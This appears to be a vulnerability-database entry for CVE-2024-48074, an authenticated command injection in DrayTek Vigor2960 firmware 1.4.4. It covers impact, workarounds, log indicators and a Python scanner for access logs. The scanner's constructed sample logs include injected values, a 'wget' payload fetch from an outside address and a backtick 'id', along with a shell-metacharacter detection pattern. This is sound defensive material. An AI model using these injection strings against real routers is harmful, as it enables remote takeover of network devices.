CVE-2024-48074

8.0 HIGH

📋 TL;DR

This vulnerability allows authenticated attackers to execute arbitrary commands on DrayTek Vigor2960 routers by injecting shell commands into the table parameter of the doPPPoE function, reached through mainfunction.cgi. An attacker holding valid web-interface credentials gains remote code execution on the router itself, from where all traffic passing through it and the networks behind it can be attacked. Only DrayTek Vigor2960 firmware version 1.4.4 is listed as affected.

💻 Affected Systems

Products:
  • DrayTek Vigor2960
Versions: Version 1.4.4
Operating Systems: Embedded router OS
Default Config Vulnerable: ⚠️ Yes
Notes: Requires an authenticated session on the router's web interface, so unchanged default credentials or weak admin passwords turn this into a practically unauthenticated issue.

📦 What is this software?

The DrayTek Vigor2960 is a dual-WAN broadband router and firewall with VPN support, aimed at small-business and branch-office deployments. It is administered through an embedded web interface, and mainfunction.cgi is one of the CGI endpoints behind that interface.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete router compromise allowing attacker to intercept all network traffic, pivot to internal networks, install persistent backdoors, and use router as attack launch point.

🟠

Likely Case

Router takeover enabling traffic interception, credential theft, network reconnaissance, and potential lateral movement to connected devices.

🟢

If Mitigated

Limited impact if the management interface is unreachable from untrusted networks, admin credentials are strong and unique, and web-interface access is logged and monitored so that injection attempts are detected and the offending account is disabled.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires authentication but is straightforward to execute once credentials are obtained. Public proof-of-concept code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Unknown

Restart Required: Yes (uploading new firmware reboots the router)

Instructions:

Check DrayTek's official support site for a Vigor2960 firmware release that addresses this CVE. If one is available, download it, confirm it is the Vigor2960 image, and upload it via the router web interface under System Maintenance > Firmware Upgrade; the router reboots into the new firmware. Until a vendor advisory names the fixed version, treat 1.4.4 as vulnerable and apply the workarounds below.

🔧 Temporary Workarounds

  • Disable remote management (applies to: all versions): Prevent external access to the router management interface. If WAN-side administration cannot be avoided, restrict it to named source addresses or require a VPN first.
  • Change default credentials (applies to: all versions): Use strong, unique passwords for router admin accounts, since the exploit needs a valid login to reach doPPPoE.

🧯 If You Can't Patch

  • Implement network segmentation so the router management interface is reachable only from a dedicated administration network or VLAN, not from the user LAN or the internet
  • Deploy network monitoring (a proxy or IDS in front of the web interface, or router syslog forwarded to a collector) to detect requests to mainfunction.cgi that carry shell metacharacters in the table parameter

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in web interface under System Maintenance > Firmware Information. If version is 1.4.4, router is vulnerable.

Check Version:

No CLI command available. Check via web interface at System Maintenance > Firmware Information

Verify Fix Applied:

Verify that the firmware version shown under System Maintenance > Firmware Information is a release DrayTek lists as fixing this issue; "later than 1.4.4" is only a proxy until the fixed version is published.

📡 Detection & Monitoring

Log Indicators:

  • Requests to mainfunction.cgi with action doPPPoE whose table parameter contains shell metacharacters (;, |, &, backticks, $( ))
  • Multiple failed authentication attempts followed by a successful login, especially from an external address
  • Unexpected processes, scheduled tasks, or payload downloads (wget/curl) originating from the router after a doPPPoE request

Network Indicators:

  • Outbound connections initiated by the router's own address to unfamiliar hosts (payload retrieval or command-and-control)
  • Scanning or login attempts against internal hosts that originate from the router's address, which a router does not normally generate
  • Management interface access from the WAN side or from LAN hosts that do not normally administer the router

SIEM Query:

Search web-server or reverse-proxy access logs for requests to 'mainfunction.cgi' whose query string or POST body contains 'action=doPPPoE' together with a 'table' parameter, then flag any table value that contains shell metacharacters (;, |, &, backticks, $( )). A legitimate table value is a plain profile identifier, so the metacharacter check separates normal configuration changes from injection attempts.
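The query above is the idea; the following Python script is an added example (not code from the original page or from DrayTek) that applies it to web-interface access logs. The log lines are constructed for illustration, and the request layout it assumes (an action=doPPPoE parameter plus a table parameter, sent either in the query string or in the POST body, with the body appended to the log line) is an assumption; adapt the line regex to whatever your proxy or collector actually records.

```python
"""Scan web-interface access logs for injection attempts against the
doPPPoE table parameter of mainfunction.cgi (added example).

The log format below is constructed; the parameter layout (action=doPPPoE
and table=...) is an assumption about how the endpoint is called.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that never belong in a PPPoE table/profile name.
INJECTION_CHARS = re.compile(r"[;|&`\n]|\$\(|\$\{")

# Constructed sample lines (not real traffic). Assumed layout:
# <client> - <user> [<time>] "<method> <target> HTTP/1.1" <status> <bytes> "<body>"
SAMPLE_LOG = """\
203.0.113.7 - admin [10/Oct/2024:12:00:01 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 512 "action=doPPPoE&table=pppoe1"
203.0.113.7 - admin [10/Oct/2024:12:00:05 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 512 "action=doPPPoE&table=pppoe1%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx%20-O%20%2Ftmp%2Fx"
203.0.113.7 - admin [10/Oct/2024:12:00:09 +0000] "GET /cgi-bin/mainfunction.cgi?action=doPPPoE&table=%60id%60 HTTP/1.1" 200 80 "-"
198.51.100.4 - admin [10/Oct/2024:12:01:00 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 512 "action=login&user=admin"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<body>[^"]*)"$'
)


def parse_line(line: str):
    """Return the request record with query-string and body parameters merged,
    or None when the line does not match the assumed log layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    # parse_qs percent-decodes values, so %3B becomes ';' and %60 becomes '`'.
    params = {k: v[-1] for k, v in parse_qs(parts.query).items()}
    body = rec["body"]
    if body and body != "-":
        params.update({k: v[-1] for k, v in parse_qs(body).items()})
    rec["path"] = parts.path
    rec["params"] = params
    return rec


def is_suspicious_table(value: str) -> bool:
    """True when the decoded table value carries shell metacharacters."""
    return INJECTION_CHARS.search(value) is not None


def scan(log_text: str):
    """Return one finding per doPPPoE request to mainfunction.cgi whose
    table parameter looks like a command injection attempt."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("mainfunction.cgi"):
            continue
        params = rec["params"]
        if params.get("action") != "doPPPoE" or "table" not in params:
            continue  # other actions, or doPPPoE without the injectable parameter
        table = params["table"]
        if is_suspicious_table(table):
            findings.append({
                "client": rec["client"],
                "user": rec["user"],
                "time": rec["time"],
                "table": table,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} user={f['user']} table={f['table']!r}")
```

Run against the constructed sample, the script reports the two injection attempts (the `;wget ...` chain and the backtick-wrapped `id`) and ignores both the benign `table=pppoe1` change and the unrelated login request. Because the check works on decoded values, percent-encoding the metacharacters does not evade it; a value that is only a profile identifier produces no finding.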
